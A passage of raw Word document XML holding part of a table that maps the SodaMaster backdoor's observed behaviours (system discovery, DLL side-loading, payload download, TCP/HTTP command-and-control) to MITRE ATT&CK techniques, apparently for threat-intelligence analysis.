          <w:p w14:paraId="2360385D" w14:textId="77777777" w:rsidR="00954688" w:rsidRPr="00B857D7" w:rsidRDefault="00954688" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5F1A5B" w14:textId="75C347F5" w:rsidR="00954688" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0482F558" w14:textId="373EE496" w:rsidR="00954688" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F0AF41B" w14:textId="1F7F9846" w:rsidR="00954688" w:rsidRPr="008D6D8A" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Based on the analysis of the backdoor features of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SodaMaster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> module, the purpose of this malware is also to download and execute payloads (DLL or shellcode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006511BA" w:rsidRPr="00B857D7" w14:paraId="0ED53022" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD006E2" w14:textId="53EB3187" w:rsidR="006511BA" w:rsidRDefault="006511BA" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A4F1DB" w14:textId="0C33260A" w:rsidR="006511BA" w:rsidRPr="006621ED" w:rsidRDefault="006511BA" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006511BA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20DF2BD0" w14:textId="2AB3AE10" w:rsidR="006511BA" w:rsidRPr="00475254" w:rsidRDefault="006511BA" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1082 ;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00ED1D17" w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CA08874" w14:textId="6A679020" w:rsidR="006511BA" w:rsidRDefault="00ED1D17" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="259FA555" w14:textId="77777777" w:rsidR="006511BA" w:rsidRPr="00B857D7" w:rsidRDefault="006511BA" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78966386" w14:textId="6C1BB7F5" w:rsidR="006511BA" w:rsidRDefault="00ED1D17" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C750DFB" w14:textId="466F441E" w:rsidR="006511BA" w:rsidRDefault="00ED1D17" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32FB0032" w14:textId="77777777" w:rsidR="006511BA" w:rsidRDefault="006511BA" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Example action</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A62B39" w14:textId="72DD07C7" w:rsidR="00ED1D17" w:rsidRDefault="00ED1D17" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SodaMaster</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> sends system information such as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>user_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>host_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">, PID of the malware module, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>OS_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00954688" w:rsidRPr="00B857D7" w14:paraId="0961FCE1" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0119A471" w14:textId="78AA829C" w:rsidR="00954688" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="009B3661">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC63806" w14:textId="2F0955CE" w:rsidR="00954688" w:rsidRPr="00B857D7" w:rsidRDefault="00475254" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006621ED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02602822" w14:textId="21E072D0" w:rsidR="00954688" w:rsidRPr="00B857D7" w:rsidRDefault="00475254" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00475254">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1574.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00475254">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DF05926" w14:textId="3A439A02" w:rsidR="00954688" w:rsidRDefault="0075689E" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00ED1D17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4898D482" w14:textId="77777777" w:rsidR="00954688" w:rsidRPr="00B857D7" w:rsidRDefault="00954688" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A1D5792" w14:textId="4563AD96" w:rsidR="00954688" w:rsidRDefault="00475254" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42B5356F" w14:textId="6F34D9CB" w:rsidR="00954688" w:rsidRDefault="00475254" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CCFC269" w14:textId="4D6F5EF5" w:rsidR="00954688" w:rsidRPr="008D6D8A" w:rsidRDefault="00CF34FF" w:rsidP="00DD0478">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB4D41" w:rsidRPr="00A44889" w14:paraId="761928A3" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12284A80" w14:textId="32DE6007" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00BB4D41" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EBEDC7B" w14:textId="77777777" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00BB4D41" w:rsidP="00021B7E">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&amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B1D1533" w14:textId="77777777" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00BB4D41" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C436CD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55C34069" w14:textId="6329E3C1" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00CF04FF" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00BB4D41">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E8AD1CA" w14:textId="77777777" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00BB4D41" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E9EFD75" w14:textId="77777777" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00BB4D41" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="646E71DB" w14:textId="77777777" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00BB4D41" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3533" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C12BE3D" w14:textId="77777777" w:rsidR="00BB4D41" w:rsidRPr="00A44889" w:rsidRDefault="00BB4D41" w:rsidP="00021B7E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44889">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="009146A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Its communication can either happen via a raw TCP socket or a HTTP POST request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF34FF" w:rsidRPr="00B857D7" w14:paraId="353E9D3C" w14:textId="77777777" w:rsidTr="00BB4D41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="510A1ECA" w14:textId="37ADFBB8" w:rsidR="00CF34FF" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00BB4D41">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C4C0048" w14:textId="109CB407" w:rsidR="00CF34FF" w:rsidRPr="00B857D7" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AB375EA" w14:textId="379102DE" w:rsidR="00CF34FF" w:rsidRPr="00B857D7" w:rsidRDefault="00CF34FF" w:rsidP="00CF34FF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CF34FF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
